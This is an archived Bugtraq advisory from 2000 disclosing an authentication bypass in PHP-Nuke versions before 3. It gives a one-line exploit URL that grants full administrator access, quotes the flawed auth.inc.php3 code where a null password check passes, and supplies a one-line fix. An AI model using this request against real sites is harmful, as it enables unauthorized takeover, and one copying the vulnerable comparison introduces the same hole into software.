NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 2000-08

Subject: Vuln. in all sites using PHP-Nuke, versions less than 3
From: Elbruj0, Gandalf (bruj0SECURITYPORTAL.COM.AR)
Date: Mon Aug 21 2000 - 14:23:40 CDT

Next message: Georgi Guninski: "IIS 5.0 cross site scripting vulnerability - using .shtml files or /_vti_bin/shtml.dll"
Previous message: Andrea Glorioso: "Re: PRNGs (was Re: machine independent protection from stack-smashingattack)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Greetings,
PHP-Nuke is a Web Portal System, storytelling software also an
automated web site to distribute news and articles with users system.

Exploit:
-------
The problem is when somebody does a
http://example.com/admin.php3?admin=whatever,
can have full access as an admin, that means posting news, and all that
the actual administrator can do.

Description:
-----------
So, lets see why this is posible, file auth.inc.php3, wich is used to
authentificate the admin:
<----snip---->
if(isset($admin)) {
  if(!IsSet($mainfile)) { include("mainfile.php3"); }
  $admin = base64_decode($admin);
  $admin = explode(":", $admin); <--- between this line and the above
$admin becomes null
  $aid = "$admin[0]"; <--- $aid
  $pwd = "$admin[1]"; <--- $pwd = so this two also are null
<---snip--->
  $result=mysql_query("select pwd from authors where aid='$aid'");
// ^^^this becomes: select pwd from authors where aid=''; wich returns nothing
<--snip--->
  } else {
    list($pass)=mysql_fetch_row($result); <---- $pass is gets null here
        if($pass == $pwd) { <-- so this translate to NULL == NULL
        $admintest = 1; <--- bingo! we're admin now!
        }
<---snip--->

Fix:

--- Now for the fix that i mailed to the author, and he then added to the last version that came out days ago, <rant>btw, he didnt even bother to mention who discoverd it, AND just said HE found it AND fix it. </rant> For thouse that doesnt want to download the latest version, at http://http://www.ncc.org.ve/php-nuke.php3, heres a quick fix: File auth.inc.php3 line 37 add, if($aid=="" || $pwd=="") exit;

Thats all have fun. --------------------------------------------- Webmaster of http://www.securityportal.com.ar bruj0phreaker.net /"\ \ / ASCII Ribbon Campaign X Against HTML Mail / \ Proud member of http://www.undersec.com ---------------------------------------------

Next message: Georgi Guninski: "IIS 5.0 cross site scripting vulnerability - using .shtml files or /_vti_bin/shtml.dll"
Previous message: Andrea Glorioso: "Re: PRNGs (was Re: machine independent protection from stack-smashingattack)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]